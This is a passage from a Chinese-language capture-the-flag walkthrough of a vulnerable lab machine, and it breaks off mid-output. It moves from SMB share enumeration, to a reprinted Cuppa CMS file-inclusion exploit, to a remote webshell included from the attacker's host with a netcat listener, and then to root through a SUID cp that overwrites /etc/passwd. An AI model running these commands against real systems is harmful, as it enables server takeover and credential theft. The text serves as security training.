hotel.\n# 0900: Check in at Frankfurt Main.\n# 1305 - 1355: Board flight (LH1190) and land in Zurich.\n# 1600 - 1900: Dinner reception\n# 2000: Check into hotel.\n\n# 5 January 2019 (Saturday):\n# 0800: Leave hotel.\n# 0930 - 1230: Visit University of Zurich.\n# 1300 - 1400: Working lunch with Mr. Pandelson\n# 1430 - 1730: Dialogue with students at the University of Zurich.\n# 1800 - 2100: Working dinner with Mr. Robert James Miller and wife.\n# 2200: Check into hotel.\n\n# 6 January 2019 (Sunday):\n# 0730: Leave hotel.\n# 0800 - 1100: Give a lecture on Software Security and Design at the University of Zurich.\n# 1130: Check in at Zurich.\n# 1715 - 2025: Board flight (LX18) and land in Newark.\n# 2230: Check into hotel.\n\n# 7 January 2019 (Monday):\n# 0800: Leave hotel.\n# 0900 - 1200: Visit Goldman Sachs HQ\n# 1230 - 1330: Working lunch with Bill de Blasio\n# 1400 - 1700: Visit McKinsey HQ\n# 1730 - 1830: Visit World Trade Center Memorial\n# 2030: Return to hotel.\n\n# 8 January 2019 (Tuesday):\n# 0630: Check out from hotel.\n# 0730: Check in at Newark.\n# 0945 - 1715 (+1): Board flight (SQ21)\n\n# 9 January 2019 (Wednesday):\n# 1715: Land in Singapore.\n# 1815 - 2015: Dinner with wife.\n# 2100: Clear local emails and head to bed.<\/code><\/pre>\n<p>\u770b\u60f3\u53bb\u662f\u4e2a\u65e5\u8bb0\uff0c\u5012\u662f\u51fa\u73b0\u4e86\u5f88\u591a\u7684\u4eba\u540d\uff0c\u800c\u4e14\u5f97\u5230\u4e86\u4e00\u4e2a\u770b\u4e0a\u53bb\u5f88\u50cf\u5bc6\u7801\u7684\u5b57\u7b26\u4e32<code>qwertyuioplkjhgfdsazxcvbnm<\/code>\u3002<\/p>\n<h4>smb\u670d\u52a1<\/h4>\n<p>\u4f7f\u7528<code>enum4linux<\/code>\u63a2\u6d4b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">enum4linux 10.160.86.46<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906932.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906932.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240322180627573\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">david\nrisk\n\nanonymous\nsecured<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fde\u63a5\u4e00\u4e0b\uff0c\u5bc6\u7801\u4f7f\u7528<code>qwertyuioplkjhgfdsazxcvbnm<\/code>\u770b\u770b\u6709\u5565\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-bash\">smbclient \/\/10.160.86.46\/anonymous<\/code><\/pre>\n<p>\u63d0\u53d6\u4e0d\u5230\u4fe1\u606f\uff0c\u53ea\u80fd\u770b\u5230\u5f88\u591a\u4e2a\u6587\u4ef6\u5939\u3002<\/p>\n<pre><code class=\"language-bash\">smbclient \/\/10.160.86.46\/secured<\/code><\/pre>\n<pre><code class=\"language-text\">Password for [WORKGROUP\\root]:\ntree connect failed: NT_STATUS_ACCESS_DENIED<\/code><\/pre>\n<p>\u989d\uff0c\u6ca1\u6709\u6743\u9650\uff0c\u5636\u3002\u5982\u679c\u5bc6\u7801\u6ca1\u6709\u95ee\u9898\u7684\u8bdd\uff0c\u5e94\u8be5\u662f\u7528\u6237\u540d\u51fa\u9519\u4e86\uff0c\u5c1d\u8bd5\u4f7f\u7528<code>david<\/code>\u548c<code>risk<\/code>\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906933.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906933.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240322181921519\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u4e0b\u8f7d\u4e0b\u6765\u7684\u6587\u4ef6\uff0c\u7785\u7785\uff1a<\/p>\n<pre><code class=\"language-text\">\/\/ David.txt\nI have concerns over how the developers are designing their webpage. The use of &quot;developmentsecretpage&quot; is too long and unwieldy. We should cut short the addresses in our local domain.\n1. Reminder to tell Patrick to replace &quot;developmentsecretpage&quot; with &quot;devops&quot;.\n2. Request the intern to adjust her Favourites to http:\/\/&lt;developmentIPandport&gt;\/devops\/directortestpagev1.php.<\/code><\/pre>\n<pre><code class=\"language-text\">\/\/ genevieve.txt\nHi! This is Genevieve!\nWe are still trying to construct our department&#039;s IT infrastructure; it&#039;s been proving painful so far.\nIf you wouldn&#039;t mind, please do not subject my site (http:\/\/192.168.254.155\/genevieve) to any load-test as of yet. We&#039;re trying to establish quite a few things:\na) File-share to our director.\nb) Setting up our CMS.\nc) Requesting for a HIDS solution to secure our host.<\/code><\/pre>\n<pre><code class=\"language-text\">\/\/ README.txt   \nREADME FOR THE USE OF THE BRAVERY MACHINE:\nYour use of the BRAVERY machine is subject to the following conditions:\n1. You are a permanent staff in Good Tech Inc.\n2. Your rank is HEAD and above.\n3. You have obtained your BRAVERY badges.\nFor more enquiries, please log into the CMS using the correct magic word: goodtech.<\/code><\/pre>\n<p>\u67e5\u770b\u4e00\u4e0b\u4ed6\u4eec\u7684\u7f51\u9875 <a href=\"http:\/\/192.168.254.155\/genevieve\">http:\/\/192.168.254.155\/genevieve<\/a><\/p>\n<p>\u8981\u6539\u4e3a\u6211\u4eec\u7535\u8111\u4e0a\u9776\u673a\u7684IP\u5730\u5740\uff1a<a href=\"http:\/\/10.160.86.46\/genevieve\">http:\/\/10.160.86.46\/genevieve<\/a><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906934.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906934.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240322182359454\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u968f\u4fbf\u7ffb\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906935.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906935.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240322182549346\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906936.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906936.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240322182623021\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5728\u8fd9\u91cc\u70b9\u51fb\u4e00\u4e0b\uff0c\u8fdb\u5165\u540e\u53f0\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906937.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906937.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240322183024654\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906938.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906938.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240322183035528\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u5bfb\u627e\u6f0f\u6d1e<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906939.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906939.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240322184240964\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6709\u4e00\u4e2a\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\uff0c\u7785\u7785\uff1a<\/p>\n<pre><code class=\"language-php\"># Exploit Title   : Cuppa CMS File Inclusion\n# Date            : 4 June 2013\n# Exploit Author  : CWH Underground\n# Site            : www.2600.in.th\n# Vendor Homepage : http:\/\/www.cuppacms.com\/\n# Software Link   : http:\/\/jaist.dl.sourceforge.net\/project\/cuppacms\/cuppa_cms.zip\n# Version         : Beta\n# Tested on       : Window and Linux\n\n  ,--^----------,--------,-----,-------^--,\n  | |||||||||   `--------&#039;     |          O .. CWH Underground Hacking Team ..\n  `+---------------------------^----------|\n    `\\_,-------, _________________________|\n      \/ XXXXXX \/`|     \/\n     \/ XXXXXX \/  `\\   \/\n    \/ XXXXXX \/\\______(\n   \/ XXXXXX \/\n  \/ XXXXXX \/\n (________(\n  `------&#039;\n\n####################################\nVULNERABILITY: PHP CODE INJECTION\n####################################\n\n\/alerts\/alertConfigField.php (LINE: 22)\n\n-----------------------------------------------------------------------------\nLINE 22:\n        &lt;?php include($_REQUEST[&quot;urlConfig&quot;]); ?&gt;\n-----------------------------------------------------------------------------\n\n#####################################################\nDESCRIPTION\n#####################################################\n\nAn attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.\n\nhttp:\/\/target\/cuppa\/alerts\/alertConfigField.php?urlConfig=[FI]\n\n#####################################################\nEXPLOIT\n#####################################################\n\nhttp:\/\/target\/cuppa\/alerts\/alertConfigField.php?urlConfig=http:\/\/www.shell.com\/shell.txt?\nhttp:\/\/target\/cuppa\/alerts\/alertConfigField.php?urlConfig=..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd\n\nMoreover, We could access Configuration.php source code via PHPStream\n\nFor Example:\n-----------------------------------------------------------------------------\nhttp:\/\/target\/cuppa\/alerts\/alertConfigField.php?urlConfig=php:\/\/filter\/convert.base64-encode\/resource=..\/Configuration.php\n-----------------------------------------------------------------------------\n\nBase64 Encode Output:\n-----------------------------------------------------------------------------\nPD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQlwdWJsaWMgJHBhc3N3b3JkID0gIkRiQGRtaW4iOwoJCXB1YmxpYyAkdGFibGVfcHJlZml4ID0gImN1XyI7CgkJcHVibGljICRhZG1pbmlzdHJhdG9yX3RlbXBsYXRlID0gImRlZmF1bHQiOwoJCXB1YmxpYyAkbGlzdF9saW1pdCA9IDI1OwoJCXB1YmxpYyAkdG9rZW4gPSAiT0JxSVBxbEZXZjNYIjsKCQlwdWJsaWMgJGFsbG93ZWRfZXh0ZW5zaW9ucyA9ICIqLmJtcDsgKi5jc3Y7ICouZG9jOyAqLmdpZjsgKi5pY287ICouanBnOyAqLmpwZWc7ICoub2RnOyAqLm9kcDsgKi5vZHM7ICoub2R0OyAqLnBkZjsgKi5wbmc7ICoucHB0OyAqLnN3ZjsgKi50eHQ7ICoueGNmOyAqLnhsczsgKi5kb2N4OyAqLnhsc3giOwoJCXB1YmxpYyAkdXBsb2FkX2RlZmF1bHRfcGF0aCA9ICJtZWRpYS91cGxvYWRzRmlsZXMiOwoJCXB1YmxpYyAkbWF4aW11bV9maWxlX3NpemUgPSAiNTI0Mjg4MCI7CgkJcHVibGljICRzZWN1cmVfbG9naW4gPSAwOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3ZhbHVlID0gIiI7CgkJcHVibGljICRzZWN1cmVfbG9naW5fcmVkaXJlY3QgPSAiIjsKCX0gCj8+\n-----------------------------------------------------------------------------\n\nBase64 Decode Output:\n-----------------------------------------------------------------------------\n&lt;?php\n        class Configuration{\n                public $host = &quot;localhost&quot;;\n                public $db = &quot;cuppa&quot;;\n                public $user = &quot;root&quot;;\n                public $password = &quot;Db@dmin&quot;;\n                public $table_prefix = &quot;cu_&quot;;\n                public $administrator_template = &quot;default&quot;;\n                public $list_limit = 25;\n                public $token = &quot;OBqIPqlFWf3X&quot;;\n                public $allowed_extensions = &quot;*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx&quot;;\n                public $upload_default_path = &quot;media\/uploadsFiles&quot;;\n                public $maximum_file_size = &quot;5242880&quot;;\n                public $secure_login = 0;\n                public $secure_login_value = &quot;&quot;;\n                public $secure_login_redirect = &quot;&quot;;\n        }\n?&gt;\n-----------------------------------------------------------------------------\n\nAble to read sensitive information via File Inclusion (PHP Stream)\n\n################################################################################################################\n Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2\n################################################################################################################<\/code><\/pre>\n<p>\u597d\u5bb6\u4f19\uff0c<code>RFI<\/code>\u548c<code>LFI<\/code>\u90fd\u6709\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906940.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906940.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240322184821441\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u6f0f\u6d1e\u5229\u7528<\/h3>\n<pre><code class=\"language-bash\">python3 -m http.server 8888\n\nnc -lvnp 1234\n\nhttp:\/\/10.160.86.46\/genevieve\/cuppaCMS\/alerts\/alertConfigField.php?urlConfig=http:\/\/10.160.78.86:8888\/webshell.php<\/code><\/pre>\n<p>\u4f46\u662f\u6ca1\u6210\u529f\uff1a<\/p>\n<pre><code class=\"language-bash\">http:\/\/10.160.86.46\/genevieve\/cuppaCMS\/alerts\/alertConfigField.php?urlConfig=http:\/\/10.160.78.86:8888\/webshell.txt<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906941.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906941.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240322185556613\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906942.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403221906942.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240322185610803\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u6210\u529f\u4e86\uff01<\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/cp\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/fusermount\n\/usr\/bin\/chage\n\/usr\/bin\/gpasswd\n\/usr\/bin\/newgrp\n\/usr\/bin\/sudo\n\/usr\/bin\/mount\n\/usr\/bin\/su\n\/usr\/bin\/umount\n\/usr\/bin\/Xorg\n\/usr\/bin\/pkexec\n\/usr\/bin\/crontab\n\/usr\/bin\/passwd\n\/usr\/bin\/ksu\n\/usr\/bin\/at\n\/usr\/bin\/staprun\n\/usr\/sbin\/pam_timestamp_check\n\/usr\/sbin\/unix_chkpwd\n\/usr\/sbin\/usernetctl\n\/usr\/sbin\/userhelper\n\/usr\/sbin\/mount.nfs\n\/usr\/lib\/polkit-1\/polkit-agent-helper-1\n\/usr\/libexec\/dbus-1\/dbus-daemon-launch-helper\n\/usr\/libexec\/flatpak-bwrap\n\/usr\/libexec\/sssd\/krb5_child\n\/usr\/libexec\/sssd\/ldap_child\n\/usr\/libexec\/sssd\/selinux_child\n\/usr\/libexec\/sssd\/proxy_child\n\/usr\/libexec\/qemu-bridge-helper\n\/usr\/libexec\/spice-gtk-x86_64\/spice-client-glib-usb-acl-helper\n\/usr\/libexec\/abrt-action-install-debuginfo-to-abrt-cache<\/code><\/pre>\n<p><code>cp<\/code>\u6709suid\u660e\u663e\u53ef\u4ee5\u8fdb\u884c\u5229\u7528\uff0c\u9996\u5148\u60f3\u5230\u7684\u5c31\u662f\u8986\u76d6<code>passwd<\/code>\u6587\u4ef6\uff0c\u521b\u5efa\u4e00\u4e2aroot\u7528\u6237\uff1a<\/p>\n<pre><code class=\"language-bash\">hack:$1$hack$xR6zsfvpez\/t8teGRRSNr.:0:0:root:\/bin\/bash<\/code><\/pre>\n<p>\u8fd9\u662f\u6628\u5929\u521a\u641e\u7684\uff0c\u53ef\u4ee5\u4f7f\u7528<code>openssl passwd -1 -salt hack hack<\/code>\u751f\u6210\u7684\uff0c\u672c\u5730\u521b\u5efa\u4e00\u4e2a<code>passwd<\/code>\u6587\u4ef6\uff0c\u7136\u540e\u4f20\u8fc7\u53bb\uff1a<\/p>\n<pre><code class=\"language-text\">root:x:0:0:root:\/root:\/bin\/bash\nbin:x:1:1:bin:\/bin:\/sbin\/nologin\ndaemon:x:2:2:daemon:\/sbin:\/sbin\/nologin\nadm:x:3:4:adm:\/var\/adm:\/sbin\/nologin\nlp:x:4:7:lp:\/var\/spool\/lpd:\/sbin\/nologin\nsync:x:5:0:sync:\/sbin:\/bin\/sync\nshutdown:x:6:0:shutdown:\/sbin:\/sbin\/shutdown\nhalt:x:7:0:halt:\/sbin:\/sbin\/halt\nmail:x:8:12:mail:\/var\/spool\/mail:\/sbin\/nologin\noperator:x:11:0:operator:\/root:\/sbin\/nologin\ngames:x:12:100:games:\/usr\/games:\/sbin\/nologin\nftp:x:14:50:FTP User:\/var\/ftp:\/sbin\/nologin\nnobody:x:99:99:Nobody:\/:\/sbin\/nologin\nsystemd-network:x:192:192:systemd Network Management:\/:\/sbin\/nologin\ndbus:x:81:81:System message bus:\/:\/sbin\/nologin\npolkitd:x:999:998:User for polkitd:\/:\/sbin\/nologin\nsshd:x:74:74:Privilege-separated SSH:\/var\/empty\/sshd:\/sbin\/nologin\npostfix:x:89:89::\/var\/spool\/postfix:\/sbin\/nologin\nchrony:x:998:996::\/var\/lib\/chrony:\/sbin\/nologin\ndavid:x:1000:1000:david:\/home\/david:\/bin\/bash\napache:x:48:48:Apache:\/usr\/share\/httpd:\/sbin\/nologin\ntss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:\/dev\/null:\/sbin\/nologin\ngeoclue:x:997:995:User for geoclue:\/var\/lib\/geoclue:\/sbin\/nologin\nmysql:x:27:27:MariaDB Server:\/var\/lib\/mysql:\/sbin\/nologin\nnginx:x:996:994:Nginx web server:\/var\/lib\/nginx:\/sbin\/nologin\nrpc:x:32:32:Rpcbind Daemon:\/var\/lib\/rpcbind:\/sbin\/nologin\nlibstoragemgmt:x:995:991:daemon account for libstoragemgmt:\/var\/run\/lsm:\/sbin\/nologin\ngluster:x:994:990:GlusterFS daemons:\/var\/run\/gluster:\/sbin\/nologin\nunbound:x:993:989:Unbound DNS resolver:\/etc\/unbound:\/sbin\/nologin\nqemu:x:107:107:qemu user:\/:\/sbin\/nologin\nusbmuxd:x:113:113:usbmuxd user:\/:\/sbin\/nologin\nrtkit:x:172:172:RealtimeKit:\/proc:\/sbin\/nologin\ncolord:x:992:988:User for colord:\/var\/lib\/colord:\/sbin\/nologin\nntp:x:38:38::\/etc\/ntp:\/sbin\/nologin\nabrt:x:173:173::\/etc\/abrt:\/sbin\/nologin\nsaslauth:x:991:76:Saslauthd user:\/run\/saslauthd:\/sbin\/nologin\npulse:x:171:171:PulseAudio System Daemon:\/var\/run\/pulse:\/sbin\/nologin\nsssd:x:990:984:User for sssd:\/:\/sbin\/nologin\nrpcuser:x:29:29:RPC Service User:\/var\/lib\/nfs:\/sbin\/nologin\nnfsnobody:x:65534:65534:Anonymous NFS User:\/var\/lib\/nfs:\/sbin\/nologin\nradvd:x:75:75:radvd user:\/:\/sbin\/nologin\ngdm:x:42:42::\/var\/lib\/gdm:\/sbin\/nologin\nsetroubleshoot:x:989:983::\/var\/lib\/setroubleshoot:\/sbin\/nologin\ngnome-initial-setup:x:988:982::\/run\/gnome-initial-setup\/:\/sbin\/nologin\ntcpdump:x:72:72::\/:\/sbin\/nologin\navahi:x:70:70:Avahi mDNS\/DNS-SD Stack:\/var\/run\/avahi-daemon:\/sbin\/nologin\nossec:x:1001:1002::\/var\/ossec:\/sbin\/nologin\nossecm:x:1002:1002::\/var\/ossec:\/sbin\/nologin\nossecr:x:1003:1002::\/var\/ossec:\/sbin\/nologin\nrick:x:1004:1004::\/home\/rick:\/bin\/bash\nhack:$1$hack$xR6zsfvpez\/t8teGRRSNr.:0:0:root:\/bin\/bash<\/code><\/pre>\n<p>\u4f20\u5230<code>\/tmp<\/code>\u540e\u66ff\u6362\u6389\u539f\u6709\u7684<code>\/etc\/passwd<\/code>\u5373\u53ef\uff1a<\/p>\n<pre><code class=\"language-text\">sh-4.2$ cd \/tmp\ncd \/tmp\nsh-4.2$ wget http:\/\/10.160.78.86:8888\/passwd\nwget http:\/\/10.160.78.86:8888\/passwd\n--2024-03-22 15:04:27--  